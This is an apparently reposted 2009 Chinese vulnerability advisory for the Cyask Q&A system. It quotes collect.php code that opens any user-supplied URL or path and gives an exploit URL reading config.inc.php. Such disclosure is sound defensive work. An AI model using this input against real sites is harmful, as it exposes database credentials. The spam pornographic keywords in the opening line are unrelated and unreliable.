欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

cyask知道系統(tǒng)collect.php頁(yè)面存在越權(quán)漏洞

  發(fā)布時(shí)間:2009-05-24 18:16:19   作者:佚名   我要評(píng)論
影響版本: Cyask 程序介紹: Cyask國(guó)內(nèi)較為多人使用的仿百度風(fēng)格的Ask系統(tǒng)。 漏洞分析: 從Collect.php代碼當(dāng)中可以看到 else   {     /*   檢查網(wǎng)址   */   $url=get_referer();   

影響版本:
Cyask

程序介紹:
Cyask國(guó)內(nèi)較為多人使用的仿百度風(fēng)格的Ask系統(tǒng)。

漏洞分析:


從Collect.php代碼當(dāng)中可以看到


else  
{    
/*  
檢查網(wǎng)址  
*/  
$url=get_referer();    
$neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);    
  
$collect_url=emptyempty($neturl) ? $url : $neturl;    
  
$contents = ”;    
if($fid=@fopen($collect_url,”r“))    
{    
do  
{    
$data = fread($fid, 4096);    
if (strlen($data) == 0)    
{    
break;    
}    
$contents .= $data;    
}    
while(true);    
fclose($fid);    
}    
else  
{    
show_message(’collect_url_error’, ”);    
exit;    
}    


漏洞利用:
http://www.target.com/collect.php?neturl=config.inc.php

解決方案:
廠商補(bǔ)丁:
cyask
-------
目前廠商已經(jīng)發(fā)布了升級(jí)補(bǔ)丁以修復(fù)這個(gè)安全問(wèn)題,請(qǐng)到廠商的主頁(yè)下載

相關(guān)文章

最新評(píng)論